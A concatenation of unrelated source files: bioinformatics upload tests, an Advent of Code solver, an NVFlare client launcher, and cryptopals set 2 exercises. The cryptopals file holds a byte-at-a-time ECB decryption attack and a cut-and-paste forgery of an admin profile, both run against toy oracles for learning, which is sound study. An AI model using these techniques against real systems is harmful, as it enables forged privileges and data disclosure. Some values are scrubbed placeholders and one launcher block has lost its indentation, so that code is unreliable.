        {"refs": ["tracks/annotation", "seq", "names"], "file": "trackList.json"},
    )
    self.assertFields(upload_gff3, "species", "Solanum tuberosum")
    self.assertFields(upload_gff3, "build", "ST")
@tag_process("upload-gtf")
def test_upload_gtf(self):
    """Upload a GTF annotation: sorted file, IGV index and JBrowse track are built."""
    # NOTE(review): "Homo Sapiens" (capital S) differs from the "Homo sapiens"
    # spelling used elsewhere in this file -- confirm whether the process
    # normalizes species names or this fixture is intentionally cased this way.
    inputs = {
        "src": "Hs GRCh38_86 upload.gtf",
        "build": "hg19",
        "source": "ENSEMBL",
        "species": "Homo Sapiens",
    }
    upload_gtf = self.run_process("upload-gtf", inputs)
    del upload_gtf.output["annot_sorted_track_jbrowse"][
        "total_size"
    ]  # Non-deterministic output.
    self.assertFile(upload_gtf, "annot_sorted", "Hs GRCh38_86 upload_sorted.gtf")
    del upload_gtf.output["annot_sorted_idx_igv"][
        "total_size"
    ]  # Non-deterministic output.
    self.assertFields(
        upload_gtf,
        "annot_sorted_idx_igv",
        {"file": "Hs GRCh38_86 upload_sorted.gtf.idx"},
    )
    self.assertFields(
        upload_gtf,
        "annot_sorted_track_jbrowse",
        {"refs": ["tracks/annotation", "seq", "names"], "file": "trackList.json"},
    )
    self.assertFields(upload_gtf, "species", "Homo Sapiens")
    self.assertFields(upload_gtf, "build", "hg19")
@tag_process("upload-sc-10x")
def test_upload_sc_reads(self):
    """10x single-cell upload: barcode/read lane counts must match."""
    # Two barcode lanes vs one read lane must fail.
    inputs = {
        "barcodes": ["10x_S1_L001_R1_001.fastq.gz", "10x_S1_L002_R1_001.fastq.gz"],
        "reads": ["10x_S1_L001_R2_001.fastq.gz"],
    }
    wrong_mates = self.run_process("upload-sc-10x", inputs, Data.STATUS_ERROR)
    error_msg = ["The number of reads and barcodes fastqs must be the same."]
    self.assertEqual(wrong_mates.process_error, error_msg)
    # Matching lane counts succeed and both sides are preserved.
    inputs = {
        "barcodes": ["10x_S1_L001_R1_001.fastq.gz", "10x_S1_L002_R1_001.fastq.gz"],
        "reads": ["10x_S1_L001_R2_001.fastq.gz", "10x_S1_L002_R2_001.fastq.gz"],
    }
    reads = self.run_process("upload-sc-10x", inputs)
    self.assertFiles(
        reads,
        "barcodes",
        ["10x_S1_L001_R1_001.fastq.gz", "10x_S1_L002_R1_001.fastq.gz"],
        compression="gzip",
    )
    self.assertFiles(
        reads,
        "reads",
        ["10x_S1_L001_R2_001.fastq.gz", "10x_S1_L002_R2_001.fastq.gz"],
        compression="gzip",
    )
@tag_process("upload-bedpe")
def test_upload_bedpe(self):
    """Upload a BEDPE file and verify it is stored with its metadata unchanged."""
    species = "Homo sapiens"
    build = "fake_genome_RSEM"
    in_file = "./annotation_bedpe/input/alk.bedpe"
    inputs_bedpe = {"src": in_file, "species": species, "build": build}
    bedpe = self.run_process("upload-bedpe", inputs_bedpe)
    self.assertFile(bedpe, "bedpe", in_file)
    self.assertFields(bedpe, "species", species)
    self.assertFields(bedpe, "build", build)
@tag_process("upload-orange-metadata")
def test_upload_metadata(self):
    """Upload Orange metadata tables (.tsv, legacy .TAB, .xlsx) and verify the
    derived summary fields; empty and malformed tables must fail."""
    base = Path("metadata_upload")
    inputs = base / "inputs"
    meta = self.run_process(
        "upload-orange-metadata",
        {
            "src": str(inputs / "sample_metatable.tsv"),
        },
    )
    self.assertFile(meta, "table", str(inputs / "sample_metatable.tsv"))
    self.assertFields(meta, "n_samples", 8)
    self.assertFields(meta, "features", "2 (12.5% missing values)")
    self.assertFields(
        meta, "target", "Regression; numerical class (12.5% missing values)"
    )
    self.assertFields(meta, "n_metas", 2)
    # Legacy upper-case .TAB extension is accepted but normalized (see info below).
    meta_tab = self.run_process(
        "upload-orange-metadata",
        {
            "src": str(inputs / "iris_legacy.TAB"),
        },
    )
    self.assertFile(meta_tab, "table", str(inputs / "iris_legacy.TAB"))
    self.assertFields(meta_tab, "n_samples", 6)
    self.assertFields(meta_tab, "features", "4 (no missing values)")
    self.assertFields(
        meta_tab,
        "target",
        "Classification; categorical class with 3 values (no missing values)",
    )
    self.assertFields(meta_tab, "n_metas", 0)
    info = ["File extension of the table was replaced with a lower case version."]
    self.assertEqual(meta_tab.process_info, info)
    # Excel input is supported as well.
    meta_xlsx = self.run_process(
        "upload-orange-metadata",
        {
            "src": str(inputs / "sample_metatable.xlsx"),
        },
    )
    self.assertFile(meta_xlsx, "table", str(inputs / "sample_metatable.xlsx"))
    self.assertFields(meta_xlsx, "n_samples", 8)
    self.assertFields(meta_xlsx, "features", "2 (12.5% missing values)")
    self.assertFields(
        meta_xlsx, "target", "Regression; numerical class (12.5% missing values)"
    )
    self.assertFields(meta_xlsx, "n_metas", 2)
    # A table with no sample rows must fail.
    empty = self.run_process(
        "upload-orange-metadata",
        {
            "src": str(inputs / "empty.tsv"),
        },
        Data.STATUS_ERROR,
    )
    error_msg = ["The uploaded table contains no samples."]
    self.assertEqual(empty.process_error, error_msg)
    # A table Orange cannot parse must fail with Orange's message.
    malformed = self.run_process(
        "upload-orange-metadata",
        {
            "src": str(inputs / "malformed.tsv"),
        },
        Data.STATUS_ERROR,
    )
    error_msg = [
        "Orange is unable to read the provided data table. "
        "Cannot parse dataset malformed.tsv: Non-continuous value "
        "in (1-based) line 4, column 3"
    ]
    self.assertEqual(malformed.process_error, error_msg)
@tag_process("upload-proteomics-sample")
def test_upload_proteomics_sample(self):
    """Upload a single proteomics sample table and verify metadata defaults."""
    base = Path("proteomics")
    inputs = base / "input"
    outputs = base / "output"
    prot_data = self.run_process(
        "upload-proteomics-sample",
        {
            "src": str(inputs / "single_sample.txt"),
            "species": "Homo sapiens",
        },
    )
    self.assertFile(prot_data, "table", str(outputs / "single_sample.txt"))
    self.assertFields(prot_data, "species", "Homo sapiens")
    self.assertFields(prot_data, "source", "UniProtKB")
@tag_process("upload-proteomics-sample-set")
def test_upload_proteomics_sample_set(self):
    """Upload a proteomics sample set; it must spawn one per-sample data object
    per sample in the set, all finishing successfully."""
    base = Path("proteomics")
    inputs = base / "input"
    outputs = base / "output"
    prot_data = self.run_process(
        "upload-proteomics-sample-set",
        {
            "src": str(inputs / "sample_set.txt"),
            "species": "Homo sapiens",
        },
    )
    self.assertFile(prot_data, "table", str(outputs / "sample_set.txt"))
    self.assertFields(prot_data, "species", "Homo sapiens")
    self.assertFields(prot_data, "source", "UniProtKB")
    # Every data object (including the spawned per-sample uploads) must be done.
    for data in Data.objects.all():
        self.assertStatus(data, Data.STATUS_DONE)
    # The fixture sample set contains two samples, so two spawned uploads.
    self.assertEqual(
        Data.objects.filter(process__slug="upload-proteomics-sample").count(), 2
    )
@skipUnlessLargeFiles(
    "6042316072_R03C01_Red.idat.gz", "6042316072_R03C01_Grn.idat.gz"
)
@tag_process("upload-idat")
def test_upload_idat(self):
    """Upload Illumina methylation IDAT channel pairs; platform/species and
    channel file-name consistency are validated."""
    large = Path("large")
    base_path = Path("methylation") / "inputs"
    inputs = {
        "red_channel": large / "6042316072_R03C01_Red.idat.gz",
        "green_channel": large / "6042316072_R03C01_Grn.idat.gz",
        "species": "Homo sapiens",
        "platform": "HM450",
    }
    idat = self.run_process("upload-idat", inputs)
    self.assertFile(
        idat,
        "red_channel",
        large / "6042316072_R03C01_Red.idat.gz",
        compression="gzip",
    )
    self.assertFile(
        idat,
        "green_channel",
        large / "6042316072_R03C01_Grn.idat.gz",
        compression="gzip",
    )
    self.assertFields(idat, "species", "Homo sapiens")
    self.assertFields(idat, "platform", "HM450")
    # HM450 is a human platform, so a mouse species must be rejected.
    inputs.update({"species": "Mus musculus"})
    wrong_species_input = self.run_process("upload-idat", inputs, Data.STATUS_ERROR)
    error_msg = [
        "Platform type HM450 does not match the selected species Mus musculus."
    ]
    self.assertEqual(wrong_species_input.process_error, error_msg)
    # A red channel whose file name does not end in _Red must be rejected.
    inputs.update(
        {
            "red_channel": base_path / "wrong_sample_name_Blue.idat.gz",
            "species": "Homo sapiens",
        }
    )
    self.run_process("upload-idat", inputs, Data.STATUS_ERROR)
@tag_process("upload-vep-cache")
def test_upload_vep_cache(self):
    """Upload an Ensembl VEP cache archive and verify the unpacked directory
    and its species/build/release metadata."""
    input_folder = Path("ensembl-vep") / "input"
    output_folder = Path("ensembl-vep") / "output"
    vep_cache = self.run_process(
        "upload-vep-cache",
        {
            "cache_file": input_folder / "cache_homo_sapiens_X.tar.gz",
            "species": "Homo sapiens",
            "build": "GRCh38",
            "release": "104",
        },
    )
    self.assertDir(
        vep_cache, "cache", output_folder / "cache_homo_sapiens_X.tar.gz"
    )
    self.assertFields(vep_cache, "species", "Homo sapiens")
    self.assertFields(vep_cache, "build", "GRCh38")
    self.assertFields(vep_cache, "release", "104")
|
<gh_stars>0
import unittest
import random
from Crypto.Cipher import AES
from set1 import fromAscii, toAscii, fromB64
from set1 import fixedXor
from set1 import isECBEncrypted
def pkcs7Padding(data, blockSize=16):
    """Apply PKCS#7 padding to `data`.

    Always pads: when len(data) is already a multiple of blockSize, a full
    extra block of padding is appended, as the standard requires.
    """
    padLength = (-len(data)) % blockSize or blockSize
    return data + bytes([padLength]) * padLength
def pkcs7Unpadding(data):
    """Strip PKCS#7 padding, raising ValueError on malformed padding.

    The previous version trusted the final byte blindly: a final byte of 0
    silently returned b'' (because data[:-0] == b''), and inconsistent pad
    bytes were accepted, silently corrupting the plaintext.
    """
    if not data:
        raise ValueError('Cannot unpad empty data')
    padLength = data[-1]
    if (
        padLength == 0
        or padLength > len(data)
        or data[-padLength:] != bytes([padLength]) * padLength
    ):
        raise ValueError('Invalid PKCS#7 padding')
    return data[:-padLength]
def encryptAESCBC(data, key, iv=None):
    """Encrypt `data` with AES in CBC mode, built manually from ECB block calls.

    `data` must already be padded to a multiple of 16 bytes; the IV defaults
    to all zeros. Returns the concatenated ciphertext blocks.
    """
    if len(data) % 16 != 0:
        raise Exception('Data length must be a multiple of 16 bytes')
    if iv is None:  # `is None`, not `== None`
        iv = bytes(16)
    # Create the ECB cipher object once instead of once per block.
    cipher = AES.new(key, AES.MODE_ECB)
    res = bytes([])
    for blockNumber in range(len(data) // 16):
        # XOR the plaintext block with the previous ciphertext block (or IV).
        block = fixedXor(data[blockNumber * 16:(blockNumber + 1) * 16], iv)
        iv = cipher.encrypt(block)
        res += iv
    return res
def decryptAESCBC(data, key, iv=None):
    """Decrypt AES-CBC ciphertext, built manually from ECB block calls.

    Inverse of encryptAESCBC: each decrypted block is XORed with the previous
    ciphertext block (or the IV, all zeros by default).
    """
    if len(data) % 16 != 0:
        raise Exception('Data length must be a multiple of 16 bytes')
    if iv is None:  # `is None`, not `== None`
        iv = bytes(16)
    # Create the ECB cipher object once instead of once per block.
    cipher = AES.new(key, AES.MODE_ECB)
    res = bytes([])
    for blockNumber in range(len(data) // 16):
        decryptedBlock = cipher.decrypt(data[blockNumber * 16:(blockNumber + 1) * 16])
        res += fixedXor(decryptedBlock, iv)
        iv = data[blockNumber * 16:(blockNumber + 1) * 16]
    return res
def getRandomAESKey():
    """Return 16 cryptographically random bytes for use as an AES-128 key.

    `random.randrange` is a deterministic PRNG and unsuitable for key
    material; draw from the OS entropy source instead.
    """
    import os  # local import keeps this module's import block unchanged
    return os.urandom(16)
# Fixed secret key shared by the ECB oracles below; generated once at import time.
UNKNOWN_AES_KEY = getRandomAESKey()
def oracle(data, key=None):
    """Challenge 11 encryption oracle.

    Wraps `data` in 5-10 random bytes on each side, pads it, then encrypts
    with either ECB or CBC chosen by a fair coin flip. Returns the tuple
    (ciphertext, isECB, key) so tests can verify the detector's guess.
    """
    data = bytes([random.randrange(0, 256) for _ in range(random.randrange(5, 11))]) + data
    data += bytes([random.randrange(0, 256) for _ in range(random.randrange(5, 11))])
    data = pkcs7Padding(data)
    isECB = random.randrange(2) == 0
    key = getRandomAESKey() if key is None else key
    if isECB:
        # Explicit mode: AES.new(key) without a mode raises under PyCryptodome
        # (PyCrypto silently defaulted to ECB).
        return AES.new(key, AES.MODE_ECB).encrypt(data), isECB, key
    else:
        return encryptAESCBC(data, key), isECB, key
def encryptAESECBWithFixedSuffix(data, key=None, suffix=None):
    """Challenge 12 oracle: ECB-encrypt data || fixed-suffix under a fixed key."""
    # Default suffix comes from challenge 12
    # NOTE(review): '<KEY>' looks like a scrubbed placeholder, not the real
    # base64 suffix constant -- restore the original value from challenge 12.
    suffix = fromB64('<KEY>') if suffix is None else suffix
    key = UNKNOWN_AES_KEY if key is None else key
    # Explicit mode: AES.new(key) without a mode raises under PyCryptodome.
    return AES.new(key, AES.MODE_ECB).encrypt(pkcs7Padding(data + suffix))
def encryptAESECBWithFixedPrefixSuffix(data, key=None, suffix=None, prefix=None):
    """Challenge 14 oracle: ECB-encrypt fixed-prefix || data || fixed-suffix."""
    # Default suffix comes from challenge 12
    suffix = fromB64('Um9sbGluJyBpbiBteSA1LjAKV2l0aCBteSByYWctdG9wIGRvd24gc28gbXkgaGFpciBjYW4gYmxvdwpUaGUgZ2lybGllcyBvbiBzdGFuZGJ5IHdhdmluZyBqdXN0IHRvIHNheSBoaQpEaWQgeW91IHN0b3A/IE5vLCBJIGp1c3QgZHJvdmUgYnkK') if suffix is None else suffix
    prefix = fromAscii('Thats our fixed-length prefix') if prefix is None else prefix
    key = UNKNOWN_AES_KEY if key is None else key
    # Explicit mode: AES.new(key) without a mode raises under PyCryptodome.
    return AES.new(key, AES.MODE_ECB).encrypt(pkcs7Padding(prefix + data + suffix))
def guessOracleBlockSize(oracle):
    """Infer (blockSize, suffixLength) of an always-padding ECB oracle.

    Feeds inputs of growing length until the ciphertext length jumps: the jump
    size is the block size, and the input length at the jump reveals how many
    suffix-plus-padding bytes fill the last block.
    """
    dataLength, ciphered = 0, oracle(bytes(0))
    firstLength = len(ciphered)
    while len(ciphered) == firstLength:
        dataLength += 1
        ciphered = oracle(bytes(dataLength))
    blockSize = len(ciphered) - firstLength
    dataLength -= 1  # largest input length that did NOT grow the ciphertext
    # BUG FIX: with an always-pad PKCS#7 oracle the length jumps when
    # dataLength + suffixLength + 1 crosses a block boundary, so the old
    # formula (firstLength - dataLength) overcounted the suffix by exactly
    # one byte (guessSuffix then "recovered" a trailing 0x01 padding byte).
    suffixLength = firstLength - dataLength - 1
    return blockSize, suffixLength
def guessSuffix(oracle):
    """Recover the fixed suffix appended by an ECB oracle, one byte at a time.

    Classic challenge-12 byte-at-a-time attack: shorten a known filler block
    by one byte so the next unknown suffix byte slides into it, then brute
    force that byte by comparing ciphertext blocks.
    """
    blockSize, suffixLength = guessOracleBlockSize(oracle)
    res = []
    # Arbitrary known filler block (ASCII '0'..'?'); only its length matters.
    data = bytes(range(48,64))
    foundBytes = 0
    while foundBytes < suffixLength:
        if (foundBytes % blockSize) == 0 and foundBytes > 0:
            # Starting a new block: the probe window becomes the last recovered block.
            data = bytes(res[foundBytes-blockSize:foundBytes])
        data = data[1:]  # drop one byte so the next unknown byte enters the target block
        firstCipher = oracle(data)
        # Ciphertext block that now ends with the unknown byte.
        targetBlock = firstCipher[(foundBytes//blockSize)*blockSize:(foundBytes//blockSize+1)*blockSize]
        b, found = -1, False
        while not(found):
            # Brute-force candidate bytes until the first block matches.
            b += 1
            cipher = oracle(data + bytes(res[(foundBytes//blockSize)*blockSize:]) + bytes([b]))
            found = (cipher[0:blockSize] == targetBlock)
        res += [b]
        foundBytes += 1
    return bytes(res)
def parseKeyValue(string):
    """Parse 'k1=v1&k2=v2' into a dict; malformed pairs raise ValueError."""
    pairs = (item.split('=') for item in string.split('&'))
    return {key: value for key, value in pairs}
def toKeyValueString(dic):
    """Serialize a profile dict in the fixed email/uid/role field order."""
    parts = [f"{field}={dic[field]}" for field in ('email', 'uid', 'role')]
    return '&'.join(parts)
def profileFor(email):
    """Build the serialized profile for `email`, rejecting metacharacters
    that would allow injecting extra key=value pairs."""
    for forbidden in ('&', '='):
        if forbidden in email:
            raise Exception('Illegal character in email: ' + email)
    return toKeyValueString({'email': email, 'uid': 10, 'role': 'user'})
def encryptUserProfile(email):
    """Encrypt the serialized profile for `email` under the module key (challenge 13)."""
    # Explicit mode: AES.new(key) without a mode raises under PyCryptodome.
    return AES.new(UNKNOWN_AES_KEY, AES.MODE_ECB).encrypt(
        pkcs7Padding(fromAscii(profileFor(email)))
    )
def decryptUserProfile(data):
    """Decrypt, unpad and parse a profile ciphertext back into a dict."""
    # Explicit mode: AES.new(key) without a mode raises under PyCryptodome.
    profileString = pkcs7Unpadding(AES.new(UNKNOWN_AES_KEY, AES.MODE_ECB).decrypt(data))
    return parseKeyValue(toAscii(profileString))
class Tester(unittest.TestCase):
    """Unit tests for cryptopals set 2, challenges 9-13."""

    def testChallenge9(self):
        """PKCS#7 padding of 'YELLOW SUBMARINE' to a 20-byte block."""
        input = fromAscii('YELLOW SUBMARINE')
        output = fromAscii('YELLOW SUBMARINE\x04\x04\x04\x04')
        self.assertEqual(pkcs7Padding(input, 20), output)

    def testChallenge10(self):
        """CBC decryption inverts CBC encryption and decodes the reference file."""
        # NOTE(review): `input` shadows the builtin; left unchanged in this
        # documentation-only pass.
        input = fromAscii('YELLOW SUBMARINEYELLOW SUBMARINE')
        key = b'YELLOW SUBMARINE'
        self.assertEqual(decryptAESCBC(encryptAESCBC(input, key), key), input)
        with open('resources/set2-challenge10.txt', 'r') as testDataFile:
            input = fromB64(testDataFile.read().replace('\n', ''))
        self.assertIn(b'Let the witch doctor, Ice, do the dance to cure ', decryptAESCBC(input, key))

    def testChallenge11(self):
        """The ECB detector agrees with the oracle's mode coin-flip over 100 runs."""
        for _ in range(100):
            cipheredData, isECB, key = oracle(bytes(100))
            self.assertEqual(isECB, isECBEncrypted(cipheredData))

    def testChallenge12(self):
        """Byte-at-a-time ECB decryption recovers the hidden suffix."""
        self.assertEqual(guessOracleBlockSize(encryptAESECBWithFixedSuffix)[0], 16)
        self.assertEqual(True, isECBEncrypted(encryptAESECBWithFixedSuffix(bytes(100))))
        suffix = guessSuffix(encryptAESECBWithFixedSuffix)
        self.assertIn('The girlies on standby waving just to say hi', toAscii(suffix))

    def testChallenge13(self):
        """ECB cut-and-paste: forge a role=admin profile from honest ciphertexts."""
        input = '<EMAIL>'
        cipheredProfile = encryptUserProfile(input)
        clearProfile = decryptUserProfile(cipheredProfile)
        self.assertEqual('user', clearProfile['role'])
        # First, we build an email such that the length of the string "email=EMAIL&uid=10&role=" is a multiple of 16
        email = ''.join('a' for _ in range(-(len("email=&uid=10&role="))%16))
        email += '@letstrythis.com' # Adding a 16 characters-long string for style
        honestCipher = encryptUserProfile(email)
        # Then we build an email that will give us the cipher of 'admin\x0b\x0b...\x0b'
        fakeEmail = ''.join(['a' for _ in range(10)])
        fakeEmail += 'admin' + ''.join([chr(11) for _ in range(11)])
        fakeProfileCipher = encryptUserProfile(fakeEmail)
        adminBlock = fakeProfileCipher[16:32]
        # And we replace the end of our honestCipher with this block
        tamperedCipher = honestCipher[:-16]
        tamperedCipher += adminBlock
        tamperedProfile = decryptUserProfile(tamperedCipher)
        self.assertEqual(email, tamperedProfile['email'])
        self.assertEqual('admin', tamperedProfile['role'])
# Run the challenge test suite when this file is executed directly.
if __name__ == '__main__':
    unittest.main()
<reponame>xphade/aoc2021<gh_stars>1-10
#!/usr/bin/env python3
from aoc_utils import get_input_path, print_elapsed_time
import re
from timeit import default_timer as timer
from typing import Iterable, List, Tuple
def extract_ranges(raw_content: str) -> Tuple[Iterable[int], Iterable[int]]:
    """Extract the inclusive x and y target ranges from the raw puzzle input."""
    numbers = [int(match) for match in re.findall(r"-?\d+", raw_content)]
    assert len(numbers) == 4
    x_start, x_stop, y_start, y_stop = numbers
    # +1 because the puzzle bounds are inclusive while range() excludes its stop.
    return (range(x_start, x_stop + 1), range(y_start, y_stop + 1))
def calculate_maximum_position(velocity: int) -> int:
    """Final position reached when `velocity` decreases by one after each step.

    This is the triangular number velocity + (velocity - 1) + ... + 1.
    """
    total = velocity * (velocity + 1)
    return total // 2
def calculate_maximum_height(target: Iterable[int]) -> int:
    """Calculate the maximum achievable height given the `target` y-range.

    A probe shot upward with velocity v returns to y=0 with velocity -(v+1);
    the largest v that still lands inside the target on the way down is
    |min(target)| - 1, and its peak height is the triangular number of v.
    (Return annotation added for consistency with the sibling functions.)
    """
    # Maximum velocity such that the probe doesn't overshoot the target on the way down
    max_velocity = abs(min(target)) - 1
    return calculate_maximum_position(max_velocity)
def get_velocity_range_x(target: Iterable[int]) -> Iterable[int]:
    """Get the range of x-velocities that can possibly reach the `target`."""
    # Smallest velocity whose total travel still reaches the target's near edge.
    slowest = 0
    while calculate_maximum_position(slowest) < min(target):
        slowest += 1
    # Anything faster than the far edge overshoots on the very first step.
    return range(slowest, max(target) + 1)
def get_velocity_range_y(target: Iterable[int]) -> Iterable[int]:
    """Get the range of y-velocities that can possibly reach the `target`."""
    bottom = min(target)
    # Shooting below `bottom` overshoots immediately; shooting up faster than
    # abs(bottom) - 1 overshoots on the way back down (see maximum height).
    return range(bottom, abs(bottom))
def is_valid_initial_velocity(
    x_velocity: int, y_velocity: int, x_target: Iterable[int], y_target: Iterable[int]
) -> bool:
    """Simulate the probe step by step and report whether it hits the target."""
    x, y = 0, 0
    right_edge = max(x_target)
    bottom_edge = min(y_target)
    # Stop once the probe has flown past the target's right or bottom edge.
    while x <= right_edge and y >= bottom_edge:
        x += x_velocity
        y += y_velocity
        # Drag pulls x-velocity toward zero; gravity decreases y-velocity.
        x_velocity = max(0, x_velocity - 1)
        y_velocity -= 1
        if x in x_target and y in y_target:
            return True
    return False
def calculate_valid_initial_velocities(
    x_target: Iterable[int], y_target: Iterable[int]
) -> List[Tuple[int, int]]:
    """Return every (x, y) initial velocity pair that hits the target."""
    # Try each candidate combination; the helper ranges keep the search small.
    return [
        (vx, vy)
        for vx in get_velocity_range_x(x_target)
        for vy in get_velocity_range_y(y_target)
        if is_valid_initial_velocity(vx, vy, x_target, y_target)
    ]
def main():
    """Solve Advent of Code 2021, day 17 (both parts) and print the results."""
    data_path = get_input_path("Day 17: Trick Shot")
    with open(data_path, "r") as file:
        raw = file.read()
    target_x, target_y = extract_ranges(raw)
    start = timer()
    highest = calculate_maximum_height(target_y)
    hits = calculate_valid_initial_velocities(target_x, target_y)
    stop = timer()
    print("Maximum reachable height:", highest)
    print("Number of valid initial velocities:", len(hits))
    print_elapsed_time(start, stop)


if __name__ == "__main__":
    main()
|
<reponame>ZiyueXu77/NVFlare
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Federated client launching script."""
import argparse
import os
import sys
import time
from nvflare.apis.fl_constant import WorkspaceConstants
from nvflare.fuel.common.excepts import ConfigError
from nvflare.fuel.sec.audit import AuditService
from nvflare.fuel.sec.security_content_service import LoadResult, SecurityContentService
from nvflare.fuel.utils.argument_utils import parse_vars
from nvflare.private.defs import AppFolderConstants, SSLConstants
from nvflare.private.fed.app.fl_conf import FLClientStarterConfiger
from nvflare.private.fed.client.admin import FedAdminAgent
from nvflare.private.fed.client.admin_msg_sender import AdminMessageSender
from nvflare.private.fed.client.client_engine import ClientEngine
from nvflare.private.fed.client.fed_client import FederatedClient
from nvflare.private.fed.utils.fed_utils import add_logfile_handler
def main():
    """Parse command-line options and run the NVIDIA FLARE client process.

    Startup sequence: argument parsing, workspace cleanup, configuration,
    security checks, registration with the FL server, and finally the admin
    agent loop that services commands until shutdown.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--workspace", "-m", type=str, help="WORKSPACE folder", required=True)
    parser.add_argument(
        "--fed_client", "-s", type=str, help="an aggregation server specification json file", required=True
    )
    parser.add_argument("--set", metavar="KEY=VALUE", nargs="*")
    parser.add_argument("--local_rank", type=int, default=0)
    args = parser.parse_args()
    kv_list = parse_vars(args.set)
    # Resolve the client config path, honoring an optional config_folder override.
    config_folder = kv_list.get("config_folder", "")
    if config_folder == "":
        args.client_config = AppFolderConstants.CONFIG_FED_CLIENT
    else:
        args.client_config = os.path.join(config_folder, AppFolderConstants.CONFIG_FED_CLIENT)
    # TODO:: remove env and train config since they are not core
    args.env = os.path.join("config", AppFolderConstants.CONFIG_ENV)
    args.train_config = os.path.join("config", AppFolderConstants.CONFIG_TRAIN)
    args.log_config = None
    # Remove stale restart/shutdown marker files from a previous run; refuse
    # to start if they cannot be deleted to avoid confusing lifecycle state.
    for name in [WorkspaceConstants.RESTART_FILE, WorkspaceConstants.SHUTDOWN_FILE]:
        try:
            f = os.path.join(args.workspace, name)
            if os.path.exists(f):
                os.remove(f)
        except BaseException:
            print("Could not remove the {} file. Please check your system before starting FL.".format(name))
            sys.exit(-1)
    rank = args.local_rank
    try:
        os.chdir(args.workspace)
        AuditService.initialize(audit_file_name=WorkspaceConstants.AUDIT_LOG)
        startup = os.path.join(args.workspace, "startup")
        conf = FLClientStarterConfiger(
            app_root=startup,
            client_config_file_name=args.fed_client,
            log_config_file_name=WorkspaceConstants.LOGGING_CONFIG,
            kv_list=args.set,
        )
        conf.configure()
        log_file = os.path.join(args.workspace, "log.txt")
        add_logfile_handler(log_file)
        trainer = conf.base_deployer
        # Validate signed security content before talking to the server.
        security_check(secure_train=trainer.secure_train, content_folder=startup, fed_client_config=args.fed_client)
        federated_client = trainer.create_fed_client(args)
        # Block until a service provider (SP) endpoint has been established.
        while not federated_client.sp_established:
            print("Waiting for SP....")
            time.sleep(1.0)
        federated_client.use_gpu = False
        federated_client.config_folder = config_folder
        # Only the rank-0 local process registers with the server.
        if rank == 0:
            federated_client.register()
        if not federated_client.token:
            print("The client could not register to server. ")
            raise RuntimeError("Login failed.")
        federated_client.start_heartbeat()
        servers = [{t["name"]: t["service"]} for t in trainer.server_config]
        admin_agent = create_admin_agent(
            trainer.client_config,
            trainer.client_name,
            trainer.req_processors,
            trainer.secure_train,
            sorted(servers)[0],
            federated_client,
            args,
            trainer.multi_gpu,
            rank,
        )
        # start() blocks, servicing admin commands until the agent shuts down.
        admin_agent.start()
        trainer.close()
    except ConfigError as ex:
        print("ConfigError:", str(ex))
    finally:
        pass
    sys.exit(0)
def security_check(secure_train: bool, content_folder: str, fed_client_config: str):
    """Verify the security content before the client starts (secure mode only).

    Args:
        secure_train (bool): if run in secure mode or not.
        content_folder (str): the folder to check.
        fed_client_config (str): fed_client.json
    """
    # The SecurityContentService must come up first: services initialized
    # later may depend on it for signed-content loading.
    SecurityContentService.initialize(content_folder=content_folder)
    if secure_train:
        insecure_list = secure_content_check(fed_client_config)
        if insecure_list:
            print("The following files are not secure content.")
            print("\n".join(insecure_list))
            sys.exit(1)
    # The AuditService backs command processing and may be used elsewhere too.
    AuditService.initialize(audit_file_name=WorkspaceConstants.AUDIT_LOG)
def secure_content_check(config: str):
    """Check the signatures of the security contents.

    Args:
        config (str): fed_client.json

    Returns:
        A list of insecure content.
    """
    insecure_list = []
    data, sig = SecurityContentService.load_json(config)
    if sig != LoadResult.OK:
        insecure_list.append(config)
    client = data["client"]
    # The client certificate, private key and root certificate must all carry
    # valid signatures; collect every file that fails the check.
    for ssl_key in (SSLConstants.CERT, SSLConstants.PRIVATE_KEY, SSLConstants.ROOT_CERT):
        path = client.get(ssl_key)
        _, sig = SecurityContentService.load_content(path)
        if sig != LoadResult.OK:
            insecure_list.append(path)
    return insecure_list
def create_admin_agent(
    client_args,
    client_id,
    req_processors,
    secure_train,
    server_args,
    federated_client: FederatedClient,
    args,
    is_multi_gpu,
    rank,
):
    """Create and wire up the admin agent for this client.

    Args:
        client_args: start client command args
        client_id: client name
        req_processors: request processors
        secure_train: True/False
        server_args: FL server args
        federated_client: FL client object
        args: command args
        is_multi_gpu: True/False
        rank: client rank process number

    Returns:
        A FedAdminAgent.
    """
    # Message sender authenticated with the client token and SSL material.
    sender = AdminMessageSender(
        client_name=federated_client.token,
        root_cert=client_args[SSLConstants.ROOT_CERT],
        ssl_cert=client_args[SSLConstants.CERT],
        private_key=client_args[SSLConstants.PRIVATE_KEY],
        server_args=server_args,
        secure=secure_train,
        is_multi_gpu=is_multi_gpu,
        rank=rank,
    )
    engine = ClientEngine(federated_client, federated_client.token, sender, args, rank)
    agent = FedAdminAgent(
        client_name="admin_agent",
        sender=sender,
        app_ctx=engine,
    )
    # Cross-link agent <-> engine <-> client so each side can reach the others.
    agent.app_ctx.set_agent(agent)
    federated_client.set_client_engine(engine)
    for processor in req_processors:
        agent.register_processor(processor)
    return agent
if __name__ == "__main__":
"""
This is the main program when starting the NVIDIA FLARE client process.
"""
# # For MacOS, it needs to use 'spawn' for creating multi-process.
# if os.name == 'posix':
# import multiprocessing
# multiprocessing.set_start_method('spawn')
# import multiprocessing
# multiprocessing.set_start_method('spawn')
main()
|
#!/usr/bin/env python3
"""Test the mib_essswitch module."""
import os
import sys
import unittest
from mock import Mock
# Try to create a working PYTHONPATH so the package under test is importable.
TEST_DIRECTORY = os.path.dirname(os.path.realpath(__file__))
SWITCHMAP_DIRECTORY = os.path.abspath(os.path.join(TEST_DIRECTORY, os.pardir))
ROOT_DIRECTORY = os.path.abspath(os.path.join(SWITCHMAP_DIRECTORY, os.pardir))
if TEST_DIRECTORY.endswith('/switchmap-ng/switchmap/test'):
    sys.path.append(ROOT_DIRECTORY)
else:
    # The message previously referenced the "bin" directory, which is not
    # what is checked above; report the directory that is actually required.
    print(
        'This script is not installed in the "switchmap-ng/switchmap/test" '
        'directory. Please fix.')
    sys.exit(2)

from switchmap.snmp import mib_essswitch as testimport
class Query(object):
